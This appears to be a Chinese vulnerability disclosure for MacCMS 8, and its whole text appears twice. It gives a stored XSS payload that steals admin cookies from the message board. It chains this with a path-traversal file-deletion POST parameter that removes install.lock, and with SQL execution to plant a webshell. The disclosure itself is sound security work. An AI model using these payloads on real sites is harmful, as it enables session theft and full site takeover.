VULHUB ™

### 简要描述： 刚发了个后台getshell，但是屌丝的攻城狮要怎么进入后台呢？XSS呀 本应该两个洞一起发的，xss+后台getshell=getshell，手快发早了，只好再找个其它的接口来充数了 ### 详细说明： 在留言板本处 插入`<svg onload=alert(document.cookie)>`即可 [<img src="https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg" alt="31.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg) 打后台 [<img src="https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg" alt="32.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg) ### 漏洞证明： 结合后台漏洞攻击： 1. 后台任意文件删除，可删除install.lock导致重装 接口 http://localhost/maccms8/admin/?m=extend-picdel post参数： `fname%5B%5D=..%2Fupload%2Fart%2F..%5C%5C..%5C%5C\inc\install.lock` 2. sql执行 之前也提到过，可写一句话后门 @农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www.wooyun.org/bugs/wooyun-2014-052217) 3. 当然也可以用我刚发的后台getshell#2直接getshell

### 简要描述： 刚发了个后台getshell，但是屌丝的攻城狮要怎么进入后台呢？XSS呀 本应该两个洞一起发的，xss+后台getshell=getshell，手快发早了，只好再找个其它的接口来充数了 ### 详细说明： 在留言板本处 插入`<svg onload=alert(document.cookie)>`即可 [<img src="https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg" alt="31.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193534aec95779d1c1066c61f85c172c33e3d2.jpg) 打后台 [<img src="https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg" alt="32.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25193608332182930df587c2d136ebdaee8b0715.jpg) ### 漏洞证明： 结合后台漏洞攻击： 1. 后台任意文件删除，可删除install.lock导致重装 接口 http://localhost/maccms8/admin/?m=extend-picdel post参数： `fname%5B%5D=..%2Fupload%2Fart%2F..%5C%5C..%5C%5C\inc\install.lock` 2. sql执行 之前也提到过，可写一句话后门 @农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www.wooyun.org/bugs/wooyun-2014-052217) 3. 当然也可以用我刚发的后台getshell#2直接getshell